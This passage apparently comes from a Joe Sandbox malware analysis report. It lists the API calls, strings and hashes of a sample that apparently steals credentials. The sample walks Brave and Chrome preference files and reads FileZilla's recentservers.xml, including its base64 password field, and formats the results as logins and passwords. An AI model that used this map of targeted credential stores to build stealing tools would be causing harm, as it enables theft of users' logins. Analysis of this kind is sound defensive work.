                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 2635522530-726946144
                        • Opcode ID: 75279a63d9149a7569ca74ad10297be92a8b881b6bfc31335f3ce0bef95e5e87
                        • Instruction ID: 3dab3f926aacea8380b8d5858cdac1d4e2839cadfe66f3f9ea03fbd6625b1586
                        • Opcode Fuzzy Hash: 75279a63d9149a7569ca74ad10297be92a8b881b6bfc31335f3ce0bef95e5e87
                        • Instruction Fuzzy Hash: BE928E71A112169FCB21EFB8DD89AAE77B9AF84300F144928F816A72D1DF74DC45CB90
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009118D2
                        • lstrlen.KERNEL32(\*.*), ref: 009118DD
                        • lstrcpy.KERNEL32(00000000,?), ref: 009118FF
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 0091190B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911932
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00911947
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 00911967
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 00911981
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009119BF
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009119F2
                        • lstrcpy.KERNEL32(00000000,?), ref: 00911A1A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00911A25
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911A4C
                        • lstrlen.KERNEL32(00931794), ref: 00911A5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911A80
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911A8C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911AB4
                        • lstrlen.KERNEL32(?), ref: 00911AC8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911AE5
                        • lstrcat.KERNEL32(00000000,?), ref: 00911AF3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911B19
                        • lstrlen.KERNEL32(015E89F8), ref: 00911B2F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911B59
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00911B64
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911B8F
                        • lstrlen.KERNEL32(00931794), ref: 00911BA1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911BC3
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911BCF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911BF8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911C25
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00911C30
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911C57
                        • lstrlen.KERNEL32(00931794), ref: 00911C69
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911C8B
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911C97
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911CC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911CEF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00911CFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911D21
                        • lstrlen.KERNEL32(00931794), ref: 00911D33
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911D55
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911D61
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911D8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911DB9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00911DC4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911DED
                        • lstrlen.KERNEL32(00931794), ref: 00911E19
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911E36
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911E42
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911E68
                        • lstrlen.KERNEL32(015EE470), ref: 00911E7E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911EB2
                        • lstrlen.KERNEL32(00931794), ref: 00911EC6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911EE3
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911EEF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911F15
                        • lstrlen.KERNEL32(015EF030), ref: 00911F2B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911F5F
                        • lstrlen.KERNEL32(00931794), ref: 00911F73
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911F90
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911F9C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911FC2
                        • lstrlen.KERNEL32(015DA5A0), ref: 00911FD8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00912000
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091200B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00912036
                        • lstrlen.KERNEL32(00931794), ref: 00912048
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00912067
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00912073
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00912098
                        • lstrlen.KERNEL32(?), ref: 009120AC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009120D0
                        • lstrcat.KERNEL32(00000000,?), ref: 009120DE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00912103
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091213F
                        • lstrlen.KERNEL32(015EE368), ref: 0091214E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00912176
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00912181
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                        • String ID: \*.*
                        • API String ID: 712834838-1173974218
                        • Opcode ID: 16604fbccb7205195482253b8e239d337563d9faaa9dda877279865ae1206a9a
                        • Instruction ID: 05143456270b08d1339e743f3a0f867484561c8884bc69cba6d55fc6536caf30
                        • Opcode Fuzzy Hash: 16604fbccb7205195482253b8e239d337563d9faaa9dda877279865ae1206a9a
                        • Instruction Fuzzy Hash: 59628F30A1161AAFCB22AF68DD88BEE77BDAF84700F140524F916A7291DF74DD45CB90
                        APIs
                        • wsprintfA.USER32 ref: 0091392C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00913943
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091396C
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 00913986
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009139BF
                        • lstrcpy.KERNEL32(00000000,?), ref: 009139E7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009139F2
                        • lstrlen.KERNEL32(00931794), ref: 009139FD
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913A1A
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00913A26
                        • lstrlen.KERNEL32(?), ref: 00913A33
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913A53
                        • lstrcat.KERNEL32(00000000,?), ref: 00913A61
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913A8A
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00913ACE
                        • lstrlen.KERNEL32(?), ref: 00913AD8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913B05
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00913B10
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913B36
                        • lstrlen.KERNEL32(00931794), ref: 00913B48
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913B6A
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00913B76
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913B9E
                        • lstrlen.KERNEL32(?), ref: 00913BB2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913BD2
                        • lstrcat.KERNEL32(00000000,?), ref: 00913BE0
                        • lstrlen.KERNEL32(015E88C8), ref: 00913C0B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913C31
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00913C3C
                        • lstrlen.KERNEL32(015E89F8), ref: 00913C5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913C84
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00913C8F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913CB7
                        • lstrlen.KERNEL32(00931794), ref: 00913CC9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913CE8
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00913CF4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913D1A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00913D47
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00913D52
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913D79
                        • lstrlen.KERNEL32(00931794), ref: 00913D8B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913DAD
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00913DB9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913DE2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913E11
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00913E1C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913E43
                        • lstrlen.KERNEL32(00931794), ref: 00913E55
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913E77
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00913E83
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913EAC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913EDB
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00913EE6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913F0D
                        • lstrlen.KERNEL32(00931794), ref: 00913F1F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913F41
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00913F4D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913F75
                        • lstrlen.KERNEL32(?), ref: 00913F89
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913FA9
                        • lstrcat.KERNEL32(00000000,?), ref: 00913FB7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913FE0
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091401F
                        • lstrlen.KERNEL32(015EE368), ref: 0091402E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914056
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00914061
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091408A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009140CE
                        • lstrcat.KERNEL32(00000000), ref: 009140DB
                        • FindNextFileA.KERNEL32(00000000,?), ref: 009142D9
                        • FindClose.KERNEL32(00000000), ref: 009142E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 1006159827-1013718255
                        • Opcode ID: 4c0abd68d796b557c9d337588bca0d553c92d7c3abc5c6f7875a8968e5345424
                        • Instruction ID: 9c416065710fb3943422406d841def72c50ae1a6b21e087ca0bff795968ad06a
                        • Opcode Fuzzy Hash: 4c0abd68d796b557c9d337588bca0d553c92d7c3abc5c6f7875a8968e5345424
                        • Instruction Fuzzy Hash: F9627031A1161AAFCB21AF68DD8DAEE77BDAF84300F148524F815A7290DF74DE45CB90
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916995
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009169C8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916A02
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916A29
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00916A34
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916A5D
                        • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00916A77
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916A99
                        • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00916AA5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916AD0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00916B00
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00916B35
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916B9D
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00916BCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 313953988-555421843
                        • Opcode ID: 2cf0f9eeb19420b51a4959c78d41ba2a65d9934bf76de94224ae47b98e76780c
                        • Instruction ID: 37ca6146d8aece152871eec3ee3f46fcc738050251c9522c2ba7e0d7e6696c0c
                        • Opcode Fuzzy Hash: 2cf0f9eeb19420b51a4959c78d41ba2a65d9934bf76de94224ae47b98e76780c
                        • Instruction Fuzzy Hash: 72429071B0461AAFCB21ABB4DD8DBAEBBB9AF84700F144414F902E7291DF74D945CB60
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DBC1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DBE4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DBEF
                        • lstrlen.KERNEL32(00934CA8), ref: 0090DBFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DC17
                        • lstrcat.KERNEL32(00000000,00934CA8), ref: 0090DC23
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DC4C
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DC8F
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DCBF
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0090DCD0
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0090DCF0
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 0090DD0A
                        • lstrlen.KERNEL32(0092CFEC), ref: 0090DD1D
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DD47
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DD70
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DD7B
                        • lstrlen.KERNEL32(00931794), ref: 0090DD86
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DDA3
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DDAF
                        • lstrlen.KERNEL32(?), ref: 0090DDBC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DDDF
                        • lstrcat.KERNEL32(00000000,?), ref: 0090DDED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DE19
                        • lstrlen.KERNEL32(00931794), ref: 0090DE3D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090DE6F
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DE7B
                        • lstrlen.KERNEL32(015E8BC8), ref: 0090DE8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DEB0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DEBB
                        • lstrlen.KERNEL32(00931794), ref: 0090DEC6
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090DEE6
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DEF2
                        • lstrlen.KERNEL32(015E8A08), ref: 0090DF01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DF27
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DF32
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DF5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DFA5
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DFB1
                        • lstrlen.KERNEL32(015E8BC8), ref: 0090DFC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DFE9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DFF4
                        • lstrlen.KERNEL32(00931794), ref: 0090DFFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E022
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090E02E
                        • lstrlen.KERNEL32(015E8A08), ref: 0090E03D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E063
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090E06E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E09A
                        • StrCmpCA.SHLWAPI(?,Brave), ref: 0090E0CD
                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0090E0E7
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090E11F
                        • lstrlen.KERNEL32(015EE368), ref: 0090E12E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E155
                        • lstrcat.KERNEL32(00000000,?), ref: 0090E15D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E19F
                        • lstrcat.KERNEL32(00000000), ref: 0090E1A9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E1D0
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0090E1F9
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090E22F
                        • lstrlen.KERNEL32(015E88C8), ref: 0090E23D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E261
                        • lstrcat.KERNEL32(00000000,015E88C8), ref: 0090E269
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0090E988
                        • FindClose.KERNEL32(00000000), ref: 0090E997
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                        • String ID: Brave$Preferences$\Brave\Preferences
                        • API String ID: 1346089424-1230934161
                        • Opcode ID: 69ea963d893e12511b6ceea807e58f3b5216136ca1bc4f9648888ed72cce6981
                        • Instruction ID: b422ad28a404577515f6b0b0fab0da4a235d36b3f165c244017edad0f230eabd
                        • Opcode Fuzzy Hash: 69ea963d893e12511b6ceea807e58f3b5216136ca1bc4f9648888ed72cce6981
                        • Instruction Fuzzy Hash: 7B527A71A116169FCB21EFB8DD89BAE7BB9AF84300F144428F856A72D1DF74DC058B90
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 009060FF
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00906152
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00906185
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009061B5
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009061F0
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00906223
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00906233
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
